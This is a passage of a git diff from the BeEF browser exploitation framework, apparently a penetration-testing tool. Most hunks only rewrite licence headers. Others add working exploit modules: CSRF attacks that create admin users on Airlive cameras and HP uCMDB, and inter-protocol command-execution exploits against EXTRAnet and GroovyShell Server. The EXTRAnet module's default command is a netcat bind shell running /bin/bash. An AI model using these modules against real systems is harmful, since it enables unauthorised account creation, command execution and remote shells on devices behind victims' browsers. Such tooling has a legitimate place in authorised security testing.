-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	var base     = '<%= @base %>'; 
 	var username = '<%= @username %>';
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
index f754f84f7..099017ee8 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
@@ -22,4 +12,4 @@ beef:
             description: "Attempts to add a user to a boastMachine <= 3.1 install."
             authors: ["bcoles", "Dr.NaNo"]
             target:
-                working: ["ALL"]
+                unknown: ["ALL"]
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
index 0fcdc068b..317e22e7f 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Boastmachine_add_user_csrf < BeEF::Core::Command
 
diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/command.js b/modules/exploits/camera/airlive_ip_camera_csrf/command.js
new file mode 100644
index 000000000..b4bb27d9e
--- /dev/null
+++ b/modules/exploits/camera/airlive_ip_camera_csrf/command.js
@@ -0,0 +1,30 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base  = '<%= @base %>'; 
+  var path  = 'cgi-bin/admin/usrgrp.cgi';
+  var user  = '<%= @user %>';
+  var pass  = '<%= @pass %>';
+
+  var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET",
+    [{'type':'hidden', 'name':'user',     'value':user},
+     {'type':'hidden', 'name':'pwd',      'value':pass},
+     {'type':'hidden', 'name':'grp',      'value':'administrator'},
+     {'type':'hidden', 'name':'sgrp',     'value':'ptz'},
+     {'type':'hidden', 'name':'action',   'value':'add'},
+     {'type':'hidden', 'name':'redirect', 'value':''}
+    ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml b/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml
new file mode 100644
index 000000000..05c6fd00a
--- /dev/null
+++ b/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# For more information see:
+# http://www.exploit-db.com/exploits/26174/
+##
+beef:
+    module:
+        airlive_add_user_csrf:
+            enable: true
+            category: ["Exploits", "Camera"]
+            name: "Airlive Add User CSRF"
+            description: "Attempts to add an admin user on a Airlive camera.

This CSRF is reported to work on the following models: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.

Note: This module has not been tested on a real device."
+            authors: ["bcoles", "Eliezer Varadé Lopez", "Javier Repiso Sánchez", "Jonás Ropero Castillo"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/module.rb b/modules/exploits/camera/airlive_ip_camera_csrf/module.rb
new file mode 100644
index 000000000..22463ca92
--- /dev/null
+++ b/modules/exploits/camera/airlive_ip_camera_csrf/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Airlive_add_user_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root',  'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'},
+			{'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/command.js b/modules/exploits/camera/dlink_dcs_series_csrf/command.js
index 725d60c24..4cfa20e8c 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/command.js
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var base = '<%= @base %>'; 
   var passwd = '<%= @password %>';
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
index af3d4a3f0..78347560b 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # More info: http://www.exploit-db.com/exploits/18509/
 #
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
index 49ed6809f..5e56aaf61 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Dlink_dcs_series_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
index 2271f1d33..700e09603 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var path    = 'adm/file.cgi';
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
index 2bc3a6bfc..84bb3bf33 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
index ffa988308..ce946808e 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/command.js b/modules/exploits/coldfusion_dir_traversal_exploit/command.js
index ec06b38d9..06062ca4a 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/command.js
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /**
  * ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor .
  * Inject into the vulnerable "locale" parameter the classic payload of a directory traversal.
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
index e65daa2c1..0f6e856c6 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
index 21d58a474..d27fd77a9 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
 
diff --git a/modules/exploits/extract_cmd_exec/command.js b/modules/exploits/extract_cmd_exec/command.js
new file mode 100644
index 000000000..505b3656d
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(extract_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/extract_cmd_exec/config.yaml b/modules/exploits/extract_cmd_exec/config.yaml
new file mode 100644
index 000000000..47de7283a
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        extract_cmd_exec:
+            enable: true
+            category: "Exploits"
+            name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
+            description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: Spaces in the command are not supported."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]
diff --git a/modules/exploits/extract_cmd_exec/module.rb b/modules/exploits/extract_cmd_exec/module.rb
new file mode 100644
index 000000000..0801fe20b
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
+###
+# EXTRAnet Collaboration Tool (extra-ct)
+# Version: 0.5.1
+# Homepage: http://www.extra-ct.net/
+# Source: http://code.google.com/p/extra-ct/
+# Source: http://sourceforge.net/projects/extract/
+###
+class Extract_cmd_exec < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '10100'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end
diff --git a/modules/exploits/glassfish_war_upload_xsrf/command.js b/modules/exploits/glassfish_war_upload_xsrf/command.js
index 9d681a207..9f1f3f0e0 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/command.js
+++ b/modules/exploits/glassfish_war_upload_xsrf/command.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 //   This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
 //   For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html
 
diff --git a/modules/exploits/glassfish_war_upload_xsrf/config.yaml b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
index 77572060e..4e34daee3 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/config.yaml
+++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/glassfish_war_upload_xsrf/module.rb b/modules/exploits/glassfish_war_upload_xsrf/module.rb
index a18ca8cd4..199208d23 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/module.rb
+++ b/modules/exploits/glassfish_war_upload_xsrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Glassfish_war_upload_xsrf < BeEF::Core::Command
 
diff --git a/modules/exploits/groovyshell_server_cmd_exec/command.js b/modules/exploits/groovyshell_server_cmd_exec/command.js
new file mode 100644
index 000000000..8f4d5f146
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\ndiscard\r\nprintln \''+cmd+'\'.execute().text\r\ngo\r\nexit\r\n'
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(groovy_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/groovyshell_server_cmd_exec/config.yaml b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
new file mode 100644
index 000000000..8bb4a20b5
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        groovyshell_server_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "GroovyShell Server Command Execution"
+            description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: Spaces in the command are not supported."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]
diff --git a/modules/exploits/groovyshell_server_cmd_exec/module.rb b/modules/exploits/groovyshell_server_cmd_exec/module.rb
new file mode 100644
index 000000000..8f0526eb8
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Groovyshell_server_command_execution < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '6789'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/command.js b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
new file mode 100644
index 000000000..cae83679b
--- /dev/null
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
@@ -0,0 +1,32 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
+beef.execute(function() {	
+var protocol = '<%= @protocol %>';
+var host = '<%= @host %>';
+var port = '<%= @port %>';
+var usertype = '<%= @usertype %>';
+var customerid = '<%= @customerid %>';
+var username = '<%= @username %>';
+var password = '<%= @password %>';
+
+var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;
+url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;
+
+if (usertype == 'createIntegrationUser'){
+	url += '&arg3=';
+}
+
+var ucmdb_iframe = beef.dom.createInvisibleIframe();
+ucmdb_iframe.setAttribute('src', url);
+
+cleanup = function() {
+    document.body.removeChild(ucmdb_iframe);
+}
+setTimeout("cleanup()", 15000);
+
+beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
+});
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
new file mode 100644
index 000000000..dee13334a
--- /dev/null
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        hp_ucmdb_add_user_csrf:
+            enable: true
+            category: "Exploits"
+            name: "HP uCMDB 9.0x add user CSRF"
+            description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).
For more information please refer to http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html"
+            authors: ["Bart Leppens"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
new file mode 100644
index 000000000..26c7bfe4b
--- /dev/null
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
@@ -0,0 +1,31 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
+
+  def self.options
+    return [
+		{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
+          'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
+          'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
+        },
